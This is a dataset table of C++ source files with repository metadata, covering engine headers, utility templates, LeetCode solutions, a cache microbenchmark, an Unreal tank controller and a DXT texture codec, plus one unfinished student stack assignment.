blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 247 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 4 111 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 58 | visit_date timestamp[ns]date 2015-07-25 18:16:41 2023-09-06 10:45:08 | revision_date timestamp[ns]date 1970-01-14 14:03:36 2023-09-06 06:22:19 | committer_date timestamp[ns]date 1970-01-14 14:03:36 2023-09-06 06:22:19 | github_id int64 3.89k 689M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 25 values | gha_event_created_at timestamp[ns]date 2012-06-07 00:51:45 2023-09-14 21:58:52 ⌀ | gha_created_at timestamp[ns]date 2008-03-27 23:40:48 2023-08-24 19:49:39 ⌀ | gha_language stringclasses 159 values | src_encoding stringclasses 34 values | language stringclasses 1 value | is_vendor bool 1 class | is_generated bool 2 classes | length_bytes int64 7 10.5M | extension stringclasses 111 values | filename stringlengths 1 195 | text stringlengths 7 10.5M |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e400f46a0b365b3cd0cb8f442b357b3f72f368f0 | 4f1dce3d800ac7562e9f6c21d5ed923d9ac48e72 | /Engine/ResourceManagement/Metafile/MetafileManager.h | 03e79299f1b1ef1c12cdba6b213face54326edea | [
"MIT"
] | permissive | mariofv/LittleOrionEngine | 16ebf6c9664b5d9b1445b1715866bd6d69d59e13 | 38ecfdf6041a24f304c679ee3b6b589ba2040e48 | refs/heads/master | 2021-07-04T04:56:01.737916 | 2021-01-06T14:03:09 | 2021-01-06T14:03:09 | 216,619,680 | 67 | 10 | MIT | 2020-12-03T13:38:41 | 2019-10-21T16:54:35 | C++ | UTF-8 | C++ | false | false | 1,477 | h | MetafileManager.h | #ifndef _METAFILEMANAGER_H_
#define _METAFILEMANAGER_H_
#include <string>
#include <unordered_map>
class Metafile;
class Path;
enum class ResourceType;
class MetafileManager
{
public:
MetafileManager() = default;
~MetafileManager();
Metafile* CreateMetafile(const std::string& asset_file_path_string, ResourceType resource_type);
Metafile* CreateMetafile(Path& asset_file_path, ResourceType resource_type, uint32_t uuid = 0);
void SaveMetafile(Metafile* created_metafile, Path& asset_file_path) const;
Metafile* GetMetafile(const Path& metafile_path);
std::string GetMetafilePath(const Path& file_path) const;
std::string GetMetafilePath(const std::string& file_path_string) const;
static std::string GetMetafileExportedFolder(const Metafile& metafile);
static std::string GetUUIDExportedFolder(uint32_t uuid);
static std::string GetMetafileExportedFile(const Metafile& metafile);
static std::string GetUUIDExportedFile(uint32_t uuid);
static void UpdateMetafile(Metafile& metafile);
/*
A metafile is consistent when both imported path and exported path exist
*/
bool IsMetafileConsistent(const Path& metafile_path);
bool IsMetafileConsistent(const Metafile& metafile);
bool IsMetafileMoved(const Path& metafile_path);
void RefreshMetafile(const Path& metafile_path);
private:
std::unordered_map<std::string, Metafile*> metafiles;
Metafile* CreateSpecializedMetafile(ResourceType resource_type) const;
};
#endif // _METAFILEMANAGER_H_
|
3617c6c01d536817e41f6b7e78ad9014568d7fe7 | 29ee4fda57c5c451ced2ff03d3f90eb11edb2451 | /src/utils_io.hpp | b5b2357a5e39f7d5f24a945594555ac971bf87c8 | [] | no_license | s-vde/cpp-utils | ad98f059d34f6952866f33b25a08c7c60c03c1be | 56f98cf0e644f8187e94e8c4f55ae23e8da2a026 | refs/heads/master | 2021-01-01T05:07:02.346400 | 2017-10-14T15:13:58 | 2017-10-14T15:13:58 | 57,329,938 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,365 | hpp | utils_io.hpp |
#ifndef UTILS_IO_HPP_INCLUDED
#define UTILS_IO_HPP_INCLUDED
#include <fstream>
#include <sstream>
/*---------------------------------------------------------------------------75*/
/**
@file utils_io.hpp
@brief Declarations and definitions of simple input/output utilities.
@author Susanne van den Elsen
@date 2015
*/
/*---------------------------------------------------------------------------++*/
namespace utils
{
namespace io
{
std::istream& skip(std::istream& is, const char c, const unsigned int nr=1);
template<typename T>
bool read_from_file(const std::string& filename, T& object)
{
std::ifstream ifs(filename);
ifs >> object;
ifs.close();
return !ifs.fail();
}
template<typename T>
bool write_to_file(
const std::string& filename,
const T& t,
std::ios_base::openmode mode=std::ios_base::out)
{
std::ofstream ofs(filename, mode);
ofs << t << std::endl;
ofs.close();
return !ofs.fail();
}
template<typename T>
std::string to_string(const T& t)
{
std::stringstream ss{};
ss << t;
return ss.str();
}
} // end namespace io
} // end namespace utils
#endif
|
ef2c1da04b48c520a35a61b977b5c93be6834e86 | 8f55c9e83b5b812b1f8ecc5383e7f7741394ad2e | /Module.h | e9692734a83afd46424b721641025a504b3a87a0 | [] | no_license | abhi1010/Price-Feed-Handler | 0bc18d04a6ab2b0df6efbe6eb176164bc7be824b | a22dbb310c6f59986a247612386a487d064e4492 | refs/heads/master | 2021-01-18T15:16:25.826019 | 2014-05-29T04:54:40 | 2014-05-29T04:54:40 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 933 | h | Module.h | #ifndef ModuleH__
#define ModuleH__
#include <stdexcept>
#include <typeinfo>
class InitModule;
template <typename T>
class Module;
class ModuleBase
{
public:
virtual ~ModuleBase() {}
template <typename T>
T* get () const
{
if (typeid(T) != mTypeInfo)
{
throw std::bad_cast ();
}
return (static_cast<const Module<T>*>(this)->get ());
}
const std::type_info& getTypeInfo () const
{ return mTypeInfo; }
protected:
ModuleBase (const std::type_info& info)
: mTypeInfo (info)
{
}
private:
ModuleBase ();
const std::type_info& mTypeInfo;
};
template <typename T>
class Module : public ModuleBase
{
public:
T* get () const { return mObject; }
private:
Module (T* obj)
: ModuleBase (typeid(T))
, mObject (obj)
{
}
T* mObject;
friend class InitModule;
};
#endif // ModuleH__
|
36a22b03ca5651a3afdafbbbdd4cc0895779f391 | 197f77ec364ff2cc6e96d8d3f362cd14eda75799 | /src/frontend/webcam-demo.cc | ab08a9afc835249195339b0462f7ceeeb25af2ec | [] | no_license | stanford-stagecast/audio | d19a4fdfc174d113485782dcf21591ad6cb02331 | d6659b99564d1cea2a9d9145591b769d019251b0 | refs/heads/main | 2023-03-14T00:04:31.461048 | 2021-03-05T20:10:04 | 2021-03-05T20:10:04 | 301,059,435 | 5 | 2 | null | 2021-02-28T03:15:51 | 2020-10-04T06:47:47 | C++ | UTF-8 | C++ | false | false | 1,151 | cc | webcam-demo.cc | #include "camera.hh"
#include "eventloop.hh"
#include "h264_encoder.hh"
#include "mp4writer.hh"
#include "scale.hh"
#include <cstdlib>
#include <unistd.h>
using namespace std;
int main()
{
Camera camera { 3840, 2160, "/dev/video0" };
Scaler scaler;
scaler.setup( 0, 0, 3840, 2160 );
H264Encoder encoder { 1280, 720, 24, "veryfast", "zerolatency" };
MP4Writer muxer { 24, 1280, 720 };
RasterYUV422 camera_frame { 3840, 2160 };
RasterYUV420 scaled_frame { 1280, 720 };
FileDescriptor output { CheckSystemCall( "dup", dup( STDOUT_FILENO ) ) };
EventLoop loop;
loop.add_rule( "encode frame", camera.fd(), Direction::In, [&] {
camera.get_next_frame( camera_frame );
scaler.scale( camera_frame, scaled_frame );
encoder.encode( scaled_frame );
if ( encoder.has_nal() ) {
muxer.write( encoder.nal().NAL, encoder.frames_encoded() - 1, encoder.frames_encoded() - 1 );
encoder.reset_nal();
}
if ( muxer.output().readable_region().size() > 0 ) {
muxer.output().pop_to_fd( output );
}
} );
while ( loop.wait_next_event( -1 ) != EventLoop::Result::Exit ) {
}
return EXIT_SUCCESS;
}
|
1c48a86e82910dec04ace70144dd2e2d65763302 | e26a1ff35adaa6cd22d577570c365bdae17645c5 | /stack-list.cpp | 36fca312fc739c246b4b72489f4012621a63bd63 | [] | no_license | adivii/list-stack | 9618729153f6ab4d80d0813ee8939ce130215d0d | ef222d3d807ab9e90bbbb9983ef6136ae54f3a82 | refs/heads/main | 2023-05-14T13:22:08.462164 | 2021-06-11T11:51:28 | 2021-06-11T11:51:28 | 374,343,673 | 0 | 0 | null | 2021-06-11T11:51:28 | 2021-06-06T11:33:10 | C++ | UTF-8 | C++ | false | false | 1,472 | cpp | stack-list.cpp | /*Tugas Kelompok Stack List
Nama-anggota:
1.
2.
3.
Link Github: .....
*/
#include <bits/stdc++.h>
#define MAX_STACK_SIZE 100
using namespace std;
class Lingkaran{
public:
double radius;
Lingkaran *next;
Lingkaran(){
this->radius=1;
}
Lingkaran(double radius){
this->radius = radius;
}
Lingkaran(Lingkaran &lingkaran) {
this->radius = lingkaran.radius;
}
double getLuas(){
return M_PI * radius * radius;
}
double getKeliling(){
return 2 * M_PI * radius;
}
};
class ListStack{
public:
Lingkaran *top;
ListStack(){
top=NULL;
}
bool isEmpty(){
//anggota 1
}
bool isFull(){
//anggota 1
}
void push(Lingkaran *item){
//anggota 2
item -> next = NULL;
if(isEmpty()){
top = item;
}else{
item -> next = top;
top = item;
}
cout << "Stack ditambahkan" << endl;
}
void push(double radius){
//anggota 2
}
Lingkaran *pop(){
if (isEmpty()){
cout<<"Data kosong"<<endl;
}else {
lingkaran *bantu;
bantu = new Lingkaran();
bantu= top;
top = top -> next;
cout << "Data Berhasil Dihapus"<< endl;
return bantu;
}
}
};
int main(){
ListStack tes;
tes.push(20);
}
|
819d81bb47c27736c2785ad45bf6074d7aaf3ab2 | 8b481519bd46f07055baf33dc290086f37b47fe6 | /leetcode/0084_v2.cpp | 053af9ba499528ccfa5c70bb78635f1d9d8b4e61 | [] | no_license | Hansimov/cs-notes | 1e0717abce9788a25636a3649664de4ba4537f90 | baab60752bafa7964cf63e3051e595c7f28bd415 | refs/heads/master | 2023-04-11T14:06:28.184490 | 2021-03-26T16:28:29 | 2021-03-26T16:28:29 | 167,122,370 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,885 | cpp | 0084_v2.cpp | // Leetcode 084 柱状图中最大的矩形
// https://www.codetd.com/article/3073438
#include <iostream>
#include <fstream>
#include <sstream>
#include <stdio.h>
#include <string>
#include <cstring>
#include <stack>
#include <vector>
#include <algorithm>
using namespace std;
static const auto _ = []() {
std::ios::sync_with_stdio(false);
std::cin.tie(nullptr);
return nullptr;
}();
class Solution {
public:
int largestRectangleArea(vector<int>& heights) {
heights.push_back(0); // Terminator
stack<int> st;
int max_area=0;
int ptr=0;
for (int i=0; i<heights.size(); ++i) {
if (st.empty() || heights[i] > heights[st.top()] ) {
st.push(i);
} else {
ptr = st.top();
st.pop();
max_area = max(max_area, heights[ptr]*(st.empty()?i:i-st.top()-1));
--i; // Important! To check all previous higher histogram.
}
}
return max_area;
}
};
int main() {
string sin, rin;
vector<string> vs;
vector<vector<int>> vn;
vector<int> vr;
ifstream fp;
fp.open("0084.txt");
int d;
int c=0;
while (getline(fp, sin, '\n')) {
vs.push_back(sin);
stringstream ss(sin);
vector<int> vni = {};
while (ss >> d) {
vni.push_back(d);
// printf("%d ", d);
}
vn.push_back(vni);
getline(fp, rin, '\n');
vr.push_back(stoi(rin.c_str(),NULL,10));
// ++c;printf("==%d==\n", c);
}
fp.close();
printf("%s\t%s\t%s\t%s\n", "T","L", "√", "?");
printf("--- --- --- --- \n");
for (int i=0; i<vs.size(); ++i) {
int r = largestRectangleArea(vn[i]);
printf("%d\t%d\t%d\t%d\n", r==vr[i], 2*i+1, vr[i], r);
// for (int j=0; j<vn[i].size(); ++j) {
// printf("\n%d", vn[i][j]);
// }
}
return 0;
} |
48bb936a79bef55305f179244add334452a86e6d | 584dd17425bba4f8ac816f171f947a2660d75204 | /HW4/Prob3/itemSet.inl | cefdce6fe9ad5215d340d1e58c4976cef97b08d4 | [] | no_license | Unwrittend/CS60 | 8052f9a385508bd4cb22361dc330249082304fb8 | c790802c3d40704038cc1283317b817702612d54 | refs/heads/master | 2020-04-29T01:04:50.141635 | 2019-03-15T00:10:06 | 2019-03-15T00:10:06 | 175,718,406 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 606 | inl | itemSet.inl | //#include "itemSet.h"
#include <new>
using namespace std;
//default
//initializes it with one spot
template <class anyType>
ItemSet<anyType>::ItemSet() : itemArrSize(0)
{
item = new anyType [itemArrSize];
}
//constructs dynamic array of size arrSize
template <class anyType>
ItemSet<anyType>::ItemSet(int arrSize) : itemArrSize(arrSize)
{
item = new anyType [itemArrSize];
}
//working on
template <class anyType>
void ItemSet<anyType>::addToSet(anyType thing)
{
itemArrSize++;
item[itemArrSize - 1] = thing;
}
template <class anyType>
ItemSet<anyType>::~ItemSet()
{
delete[] item;
}
|
fc51765553d2df2641d3ea34058881207813a315 | 916b2132bcd49372fca98c3002d49b70daf741d3 | /time_travel.cpp | 5fcda6f5705688f2707d20943701aad9d092d45a | [] | no_license | JaeHun0304/cpp_study | 863e07b07506d6c0b920f476aa38e3006a458261 | afb10ff210a91ea13e476a6f71a1db42f625e92d | refs/heads/main | 2023-01-13T09:45:16.689204 | 2020-11-09T03:30:20 | 2020-11-09T03:30:20 | 310,962,593 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 332 | cpp | time_travel.cpp | #include <vector>
#include <iostream>
#include <limits>
using namespace std;
int main(){
int W = 4, G = 4;
int MAX_V = 100;
vector<pair<int, int>> adj[MAX_V];
adj[1] = { make_pair(0, 4), make_pair(4, -4) };
adj[2] = { make_pair(0, 4), make_pair(3, 5) };
adj[3] = { make_pair(2, -7) };
adj[4] = { make_pair(4, -1) };
} |
fc203b8582a6e66304b767830cba27d834999117 | 8aea83b30123c5dd57c895742bc796b208508ac4 | /cs_microbench/ithrash.cc | d147e46ff23f63bc479a4e6d0f36aba0825ec5db | [
"BSD-3-Clause"
] | permissive | problame/ba-osv-apps | 73a0ae5ff421d080b2b847aeb4be9bbc16fcbed2 | 8cb55dcfa9877e44e60c5dc4718b9f9d4549c576 | refs/heads/master | 2021-04-18T18:41:59.495917 | 2018-03-22T10:41:14 | 2018-03-22T10:41:14 | 126,310,073 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,347 | cc | ithrash.cc | /** About this benchmark
*
* Experiment with icache thrashing and show the usefulness of stages.
*
* Allocate WS_COUNT working sets of icache_work of WS_SIZE.
* Cycle between them for ITERATIONS and do one unit of work each.
*
* Can use perf or likwid to view icache misses or use the HIST_(START|END)
* arguments to get a histogram of the duration it took to work one iteration
* of the current WS> Note that this value does not include the migration cost.
*
* When profiling using perf counters, ITERATIONS needs to be pretty big (run
* several seconds) to marginalize all the icache misses introduced by
* generating the icache_work + possibly PF handling.
*
* Configuration fitting L1 cache on Intel(R) Xeon(R) CPU E5-2618L v3 @ 2.30GHz:
* perf stat -e icache.hit,icache.misses ./cs_microbench.wrapper --nobmr --bench=ithrash 8*1024 2 10000000 0 0 0
*
* 1,238,751,566 icache.hit:u
* 130,240 icache.misses:u
*
* 1.221487074 seconds time elapsed
*
* Configuration thrashing L1 cache on Intel(R) Xeon(R) CPU E5-2618L v3 @ 2.30GHz
* (notice ratio and execution time):
* perf stat -e icache.hit,icache.misses ./cs_microbench.wrapper --nobmr --bench=ithrash 32*1024 2 10000000 0 0 0
* 37,757,666,715 icache.hit:u
* 2,396,263,636 icache.misses:u
* 33.856042099 seconds time elapsed
*
*/
#include "cs_microbench.hh"
#include "work.hh"
#include "histogram.hh"
#include <osv/stagesched.h>
#include <stdexcept>
#include <algorithm>
#include <array>
#include <vector>
#include <stdexcept>
#include <chrono>
#include <assert.h>
#include <stdlib.h>
#include <inttypes.h>
#include <stdio.h>
using namespace cs_microbench;
struct work_item {
sched::stage *stage;
icache_work *work;
};
int IThrash::run(bench_args_type args) {
using namespace std;
if (args.size() != 6) {
throw runtime_error("usage: WS_SIZE[KiB] WS_COUNT ITERATIONS HIST_START HIST_END USE_STAGES");
}
int size = std::stoi(args[0])*1024;
int work_count = std::stoi(args[1]);
int iterations = std::stoi(args[2]);
int hist_start = std::stoi(args[3]);
int hist_end = std::stoi(args[4]); // == 0 disables histogram
int use_stages = std::stoi(args[5]);
std::vector<work_item> work;
for (int s = 0; s < work_count; s++) {
work_item wi;
if (use_stages) {
wi.stage = sched::stage::define("stage" + s);
if (wi.stage == nullptr) {
throw std::runtime_error("cannot define stage");
}
}
wi.work = new icache_work(size);
work.push_back(wi);
}
register bool use_hist = hist_end > 0;
util::hist_linear hist(20, hist_start, use_hist ? hist_end : 1);
chrono::time_point<chrono::high_resolution_clock> before, after;
chrono::duration<double, std::nano> delta;
for (int i = 0; i < iterations; i++) {
auto w = work[i%work.size()];
if (use_stages) {
w.stage->enqueue();
}
if (use_hist) before = chrono::high_resolution_clock::now();
w.work->work(1);
if (use_hist) {
after = chrono::high_resolution_clock::now();
delta = after - before;
hist(((double)delta.count()));
}
}
if (use_hist)
hist.dump();
}
|
2c0e91f415e0c79705682157be7b8ac47f551cbc | 407707d8e5065e162627164593e4b7f753adc6f7 | /MatAsReturn/MatAsReturn.cpp | 112fb08de3cf6040fb3a136b2151cb9242299d1e | [] | no_license | Andromeda2333/ImageProcessing | 5cf7ce1c9160bac4d15dfc0c83be0961af0e7962 | 8000384233dfe066dbe0b127ae7de43151e4c025 | refs/heads/master | 2020-05-04T19:28:13.522050 | 2015-10-22T17:03:49 | 2015-10-22T17:03:49 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 850 | cpp | MatAsReturn.cpp | // MatAsReturn.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include <iostream>
cv::Mat ROI(cv::Mat& image,int i,int j);
uchar Average(cv::Mat& localImage);
int _tmain(int argc, _TCHAR* argv[])
{
cv::Mat image=cv::imread("image.tif");
cv::cvtColor(image,image,CV_RGB2GRAY);
for (int i=0;i<100;++i)
{
std::cout<<static_cast<int>(Average(ROI(image,i,i)))<<std::endl;
}
return 0;
}
cv::Mat ROI( cv::Mat& image,int i,int j)
{
return cv::Mat(image,cv::Rect(i,j,3,3));
}
uchar Average( cv::Mat& localImage )
{
int sum=0;
for (int i=0;i<localImage.rows;++i)
{
for (int j=0;j<localImage.cols;++j)
{
sum+=localImage.at<uchar>(i,j);
}
}
return sum/(localImage.rows*localImage.cols);
}
|
3f88e690c7a13a884dca03bcb20cf588cd0bd662 | 7ac293b25a6bbc1cd8b26b51cf376a34f37ae79a | /数据结构/哈希表/小结/四数相加②.cpp | be777c0c6371a771c03a45c8e9ce1b3af32a37b3 | [] | no_license | SwordHarry/LeetCode | 38382820d0ec2d3b3ba101a1219a4b8cec56fc06 | 1b8b328a1213ed0b6c8546511dcad73bdb4f57d3 | refs/heads/master | 2020-04-17T14:32:45.783929 | 2019-07-25T17:04:35 | 2019-07-25T17:04:35 | 166,660,880 | 3 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,998 | cpp | 四数相加②.cpp | /**
* Given four lists A, B, C, D of integer values, compute how many tuples (i, j, k, l) there are such that A[i] + B[j] + C[k] + D[l] is zero.
To make problem a bit easier, all A, B, C, D have same length of N where 0 ≤ N ≤ 500. All integers are in the range of -228 to 228 - 1 and the result is guaranteed to be at most 231 - 1.
Example:
Input:
A = [ 1, 2]
B = [-2,-1]
C = [-1, 2]
D = [ 0, 2]
Output:
2
Explanation:
The two tuples are:
1. (0, 0, 0, 1) -> A[0] + B[0] + C[0] + D[1] = 1 + (-2) + (-1) + 2 = 0
2. (1, 1, 0, 0) -> A[1] + B[1] + C[0] + D[0] = 2 + (-1) + (-1) + 0 = 0
*
*/
#include <vector>
#include <unordered_map>
#include <algorithm>
using namespace std;
class Solution {
public:
int fourSumCount(vector<int>& A, vector<int>& B, vector<int>& C, vector<int>& D) {
int len = A.size();
unordered_map<int,int> m;
for(int i = 0;i < len;i++) {
for(int j = 0;j < len;j++) {
m[A[i] + B[j]]++;
}
}
int result = 0;
for(int i = 0;i < len;i++) {
for(int j = 0;j < len;j++) {
if(m.count(-(C[i] + D[j]))) {
result += m[-(C[i] + D[j])];
}
}
}
return result;
}
// 将 map 转回 vector, 使其获得有序性
vector<int> topKFrequent_answer(vector<int>& nums, int k) {
unordered_map<int,int> m;
int len = nums.size();
for(int i = 0;i < len;i++) {
m[nums[i]]++;
}
vector<pair<int,int>> temp(m.begin(),m.end());
sort(temp.begin(),temp.end(),compare);
vector<int> result;
for(int i = 0;i < k;i++) {
result.push_back(temp[i].first);
}
return result;
}
static bool compare(const pair<int,int> &x,const pair<int,int> &y) {
return x.second > y.second;
}
}; |
34da944e6e96f0c56f27b0770314aa4933c22979 | 5a3be2e6fcf376527b277ad3fc6a8a8320aff0c5 | /GroupC/Freecell/ConfigScene.cpp | c9c9c8fe0bf178e3fe94dc2a54ece7df69376401 | [] | no_license | nitsc-proclub/Bunaiprocon2020 | 0088af16bbf43611fbef0edfb25e692b4cd4e2ab | 484a33743d7a9d13d691a3c64dfb9810c97b3a79 | refs/heads/master | 2021-05-25T07:24:32.508785 | 2020-04-07T07:17:32 | 2020-04-07T07:17:32 | 253,712,130 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 344 | cpp | ConfigScene.cpp | #include"ConfigScene.h"
#include"BoxFloatEffect.h"
ConfigScene::ConfigScene()
{
Controller::CanShowSoftKey = true;
interval = Stopwatch(true);
}
void ConfigScene::Loop()
{
if (interval.sF() >= 1)
{
Event::New(std::shared_ptr<IEvent>(new BoxFloatEffect(6, Size(30, 30))), 0, 300, Background);
interval.restart();
}
}
|
1097ae48378fa1a60d62bf64d47fad7fb7dc76d7 | 15cc4233e943c5ae75a4dcd45b8902977e4646ff | /BattleTank/Source/BattleTank/TankPlayerController.cpp | 93a6bebd42ff8f81a24b843d234a6135881858b8 | [] | no_license | hunter-morabito/BattleTank | e74ab1d3fcd9d3cf66c4870b99c6c802463d2fb1 | 6ba411e71d262e68b30dce33d11ee4939c860878 | refs/heads/master | 2021-05-04T14:53:38.903875 | 2018-05-08T01:01:09 | 2018-05-08T01:01:09 | 120,212,905 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,885 | cpp | TankPlayerController.cpp | // Fill out your copyright notice in the Description page of Project Settings.
#include "TankPlayerController.h"
#include "Tank.h"
void ATankPlayerController::BeginPlay()
{
Super::BeginPlay();
auto ControlledTank = GetControlledTank();
if (ControlledTank)
{
UE_LOG(LogTemp, Warning, TEXT("Player Possessed Tank %s"), *(ControlledTank->GetName()));
}
else {
UE_LOG(LogTemp, Warning, TEXT("Failed to possess tank"));
}
}
void ATankPlayerController::Tick(float DeltaTime)
{
Super::Tick(DeltaTime);
AimTowardsCrosshair();
}
ATank* ATankPlayerController::GetControlledTank() const
{
return Cast<ATank>(GetPawn());
}
void ATankPlayerController::AimTowardsCrosshair()
{
if (!GetControlledTank()) { return; }
FVector HitLocation; // Out Parameter
if (GetSightRayHitLocation(HitLocation))
{
//UE_LOG(LogTemp, Warning, TEXT("Hit Location: %s"), *HitLocation.ToString());
GetControlledTank()->AimAt(HitLocation);
}
}
bool ATankPlayerController::GetSightRayHitLocation(FVector &HitLocation) const {
// Find the crosshair position
int32 ViewportSizeX, ViewportSizeY;
// Fills in the viewport (screen) size
GetViewportSize(ViewportSizeX, ViewportSizeY);
// Get Screen location of the dot, position is recorded in two spaces, right now its .5 horizontal and .333333 vertical
FVector2D ScreenLocation = FVector2D(CrossHairXLocation * ViewportSizeX, CrossHairYLocation * ViewportSizeY);
FVector LookDirection;
if (GetLookDirection(ScreenLocation, LookDirection))
{
// Line-trace along that look direction, and see what we hit (up to max range)
FHitResult LookVectorHitLocation;
GetLookVectorHitLocation(LookDirection, HitLocation);
//UE_LOG(LogTemp, Warning, TEXT("Hit Location: %s"), *HitLocation.ToString());
}
return true;
}
bool ATankPlayerController::GetLookDirection(FVector2D ScreenLocation, FVector &LookDirection) const {
// "De-project" the screen position of the crosshair to a world direction
// Out Params for deprojecting the position on screen
FVector WorldLocation; // To be discarding
if (DeprojectScreenPositionToWorld(ScreenLocation.X, ScreenLocation.Y, WorldLocation, LookDirection)) // Ignoring WorldLocation because it returns the camera's world location
{
// UE_LOG(LogTemp, Warning, TEXT("Look Direction: %s"), *LookDirection.ToString());
return true;
}
return false;
}
bool ATankPlayerController::GetLookVectorHitLocation(FVector LookDirection, FVector &LookVectorHitLocation) const
{
FHitResult HitResult;
auto StartLocation = PlayerCameraManager->GetCameraLocation();
FVector EndLocation = StartLocation + (LookDirection * LineTraceRange);
if (GetWorld()->LineTraceSingleByChannel(
HitResult,
StartLocation,
EndLocation,
ECollisionChannel::ECC_Visibility))
{
LookVectorHitLocation = HitResult.Location;
return true;
}
LookVectorHitLocation = FVector(0);
return false;
}
|
ad4377a584b106e7536534ca873eefeadd699447 | 69e2e5fb5220d3311b9d1e4c2bb2f6c1722a156a | /altona_wz4/altona/examples/dxt/codec_ms.cpp | 3a1f70b81f2111b2b51901fe08b10464c5b120fd | [
"BSD-3-Clause",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | kebby/fr_public | c2acb4787472c5e039805a084894a7858dd6d19a | 2bb82d30bf9d10cf2a94b445710942ac9f065391 | refs/heads/master | 2021-01-16T00:36:57.267206 | 2012-08-16T03:36:05 | 2012-08-16T03:36:05 | 4,026,092 | 6 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 4,015 | cpp | codec_ms.cpp |
/****************************************************************************/
/*** ***/
/*** (C) 2005 Dierk Ohlerich, all rights reserved ***/
/*** ***/
/****************************************************************************/
#include <windows.h>
#include <d3d9.h>
#include <d3dx9.h>
#include "codec_ms.hpp"
#include "base/graphics.hpp"
extern IDirect3DDevice9 *DXDev;
void DXError(sU32 err,const sChar *file,sInt line,const sChar *system);
#define DXErr(err) { if(FAILED(err)) DXError(err,sTXT(__FILE__),__LINE__,L"d3d"); }
/****************************************************************************/
/****************************************************************************/
CodecMS::CodecMS()
{
}
CodecMS::~CodecMS()
{
}
/****************************************************************************/
const sChar *CodecMS::GetName()
{
return L"microsoft";
}
void CodecMS::Pack(sImage *bmp,sImageData *dxt,sInt level)
{
IDirect3DSurface9 *surf;
sInt xs,ys;
D3DFORMAT d3dformat,srcfmt;
sImage *bmpdel=0;
D3DLOCKED_RECT lr;
RECT wr;
sU8 *s,*d;
sInt blocksize;
xs = bmp->SizeX;
ys = bmp->SizeY;
switch(level)
{
case sTEX_DXT1:
d3dformat = D3DFMT_DXT1;
srcfmt = D3DFMT_X8R8G8B8;
blocksize = 8;
break;
case sTEX_DXT1A:
d3dformat = D3DFMT_DXT1;
srcfmt = D3DFMT_A8R8G8B8;
blocksize = 8;
bmpdel = bmp->Copy();
bmp = bmpdel;
for(sInt i=0;i<bmp->SizeX*bmp->SizeY;i++)
{
if(bmp->Data[i]>=0x80000000)
bmp->Data[i]|=0xff000000;
else
bmp->Data[i]&=0x00ffffff;
}
break;
case sTEX_DXT3:
d3dformat = D3DFMT_DXT3;
srcfmt = D3DFMT_A8R8G8B8;
blocksize = 16;
break;
case sTEX_DXT5:
d3dformat = D3DFMT_DXT5;
srcfmt = D3DFMT_A8R8G8B8;
blocksize = 16;
break;
default:
d3dformat = D3DFMT_UNKNOWN;
srcfmt = D3DFMT_UNKNOWN;
blocksize = 0;
sVERIFYFALSE;
}
wr.top = 0;
wr.left = 0;
wr.right = xs;
wr.bottom = ys;
surf = 0;
sVERIFY(DXDev);
DXErr(DXDev->CreateOffscreenPlainSurface(xs,ys,d3dformat,D3DPOOL_SCRATCH,&surf,0));
DXErr(D3DXLoadSurfaceFromMemory(surf,0,0,bmp->Data,srcfmt,xs*4,0,&wr,D3DX_FILTER_POINT|D3DX_FILTER_DITHER,0));
DXErr(surf->LockRect(&lr,0,D3DLOCK_READONLY));
s = (sU8 *)lr.pBits;
d = dxt->Data;
for(sInt y=0;y<ys;y+=4)
{
sCopyMem(d,s,xs/4*blocksize);
s += lr.Pitch;
d += xs/4*blocksize;
}
DXErr(surf->UnlockRect());
surf->Release();
delete bmpdel;
}
/****************************************************************************/
void CodecMS::Unpack(sImage *bmp,sImageData *dxt,sInt level)
{
IDirect3DSurface9 *surf;
sInt xs,ys;
D3DFORMAT d3dformat;
D3DLOCKED_RECT lr;
RECT wr;
sU8 *s,*d;
sInt blocksize;
xs = bmp->SizeX;
ys = bmp->SizeY;
switch(level)
{
case sTEX_DXT1:
case sTEX_DXT1A:
d3dformat = D3DFMT_DXT1;
blocksize = 8;
break;
case sTEX_DXT3:
d3dformat = D3DFMT_DXT3;
blocksize = 16;
break;
case sTEX_DXT5:
d3dformat = D3DFMT_DXT5;
blocksize = 16;
break;
default:
d3dformat = D3DFMT_UNKNOWN;
blocksize = 0;
sVERIFYFALSE;
}
wr.top = 0;
wr.left = 0;
wr.right = xs;
wr.bottom = ys;
surf = 0;
sVERIFY(DXDev);
DXErr(DXDev->CreateOffscreenPlainSurface(xs,ys,D3DFMT_A8R8G8B8,D3DPOOL_SCRATCH,&surf,0));
DXErr(D3DXLoadSurfaceFromMemory(surf,0,0,dxt->Data,d3dformat,xs/4*blocksize,0,&wr,D3DX_FILTER_POINT,0));
DXErr(surf->LockRect(&lr,0,D3DLOCK_READONLY));
s = (sU8 *)lr.pBits;
d = (sU8 *)bmp->Data;
for(sInt y=0;y<ys;y++)
{
sCopyMem(d,s,xs*4);
s += lr.Pitch;
d += xs*4;
}
DXErr(surf->UnlockRect());
surf->Release();
}
/****************************************************************************/
/****************************************************************************/
|
32dacec565502f5de36c505dd03e41b3c998c355 | ec6a71b57ebe88538269197fd16bede6bc2062ae | /lib/wx/api_gen/wx_extra/added_func.h | bf18a16c6c10ebfdc00478c8be0628d862e268c6 | [
"Apache-2.0"
